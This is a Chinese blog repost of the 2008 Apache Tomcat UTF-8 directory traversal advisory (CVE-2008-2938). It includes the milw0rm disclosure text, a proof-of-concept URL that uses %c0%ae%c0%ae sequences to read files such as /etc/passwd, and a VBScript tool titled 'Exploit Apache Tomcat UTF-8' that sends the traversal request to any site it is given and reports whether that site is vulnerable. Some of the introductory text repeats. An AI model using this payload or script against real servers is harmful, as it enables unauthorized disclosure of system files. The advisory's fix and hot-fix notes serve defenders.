Apache Tomcat UTF-8编码漏洞[转载至邪恶八进制]
2009-01-15 19:53
477 查看
Apache Tomcat出了一个类似当年IIS url 编码的漏洞。漏洞发生在Apache Tomcat处理UTF-8编码时,没有正确转换,从而导致在处理包含%c0%ae%c0%ae的url时转换为类似../的形式,使得可以遍历系统任意文件,包括
/etc/passwd等
触发的条件为Apache Tomcat的配置文件context.xml 或 server.xml 的'allowLinking' 和 'URIencoding' 允许'UTF-8'选项
VBS 测试版:
/etc/passwd等
触发的条件为Apache Tomcat的配置文件context.xml 或 server.xml 的'allowLinking' 和 'URIencoding' 允许'UTF-8'选项
Title: Apache Tomcat Directory Traversal Vulnerability Author: Simon Ryeo(bar4mi (at) gmail.com, barami (at) ahnlab.com) Severity: High Impact: Remote File Disclosure Vulnerable Version: prior to 6.0.18 Solution: - Best Choice: Upgrade to 6.0.18 (http://tomcat.apache.org) - Hot fix: Disable allowLinking or do not set URIencoding to utf8 in order to avoid this vulnerability. - Tomcat 5.5.x and 4.1.x Users: The fix will be included in the next releases. Please apply the hot fix until next release. References: - http://tomcat.apache.org/security.html - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2938 History: - 07.17.2008: Initiate notify (To Apache Security Team) - 08.02.2008: Responsed this problem fixed and released new version - 08.05.2008: Notify disclosure (To Apache Tomcat Security Team) - 08.10.2008: Responsed with some suggestions. Description As Apache Security Team, this problem occurs because of JAVA side. If your context.xml or server.xml allows 'allowLinking'and 'URIencoding' as 'UTF-8', an attacker can obtain your important system files.(e.g. /etc/passwd) Exploit If your webroot directory has three depth(e.g /usr/local/wwwroot), An attacker can access arbitrary files as below. (Proof-of-concept) http://www.target.com/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/foo/bar # milw0rm.com [2008-08-11]
VBS 测试版:
Dim strUrl,strSite showB() Set Args = Wscript.Arguments If Args.Count <> 1 Then ShowU() Else strSite=Args(0) End If strUrl="/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/foo/bar" Set objXML = CreateObject("Microsoft.XMLHTTP") objXML.Open "GET",strSite & strUrl, False objXML.SetRequestHeader "Referer", strSite objXML.send() if objXML.status=200 then wscript.echo("存在漏洞") end if Sub showB() With Wscript .Echo("+--------------------------=====================------------------------------+") .Echo("Exploit Apache Tomcat UTF-8") .Echo("Code By Safe3") .Echo("+--------------------------=====================------------------------------+") End with End Sub Sub showU() With Wscript .Echo("+--------------------------=====================------------------------------+") .Echo("用法:") .Echo(" cscript "&.ScriptName&" site") .Echo("例子:") .Echo(" cscript "&.ScriptName&" http://www.example.com >result.txt") .Echo("+--------------------------=====================------------------------------+") .Quit End with End Sub
相关文章推荐
- Apache Tomcat UTF-8编码漏洞
- Apache Tomcat UTF-8编码漏洞
- 配置Apache和Tomcat使用UTF-8编码
- Apache+Tomcat中支持“UTF-8”编码的中文地址(转)
- Apache+Tomcat中支持“UTF-8”编码的中文地址
- tomcat 编码设置 成中文utf-8编码 保证参数为中文时 不出错
- Apache与Tomcat负载均衡(转载)
- (转载)IE显示utf-8编码页面空白的原因及解决办法
- ASCII、Unicode和UTF-8编码知识详解——转载
- 设置tomcat中的编码为utf-8
- Apache+tomcat+mod_jk+centos6.2负载均衡集群配置--转载
- window xp Apache与Tomcat集群配置--转载
- 设置Tomcat的UTF-8编码
- 设置tomcat的编码为utf-8
- 如何设置tomcat服务器编码为utf-8编码
- 【转载】utf-8编码引起js输出中文乱码的解决办法
- [转载]谈谈Unicode编码,简要解释UCS、UTF、BMP、BOM等名词
- 设置Tomcat的UTF-8编码
- 【转载】关于Python脚本开头两行的:#!/usr/bin/python和# -*- coding: utf-8 -*-的作用 – 指定文件编码类型
- 【转载】关于Python脚本开头两行的:#!/usr/bin/python和# -*- coding: utf-8 -*-的作用 – 指定文件编码类型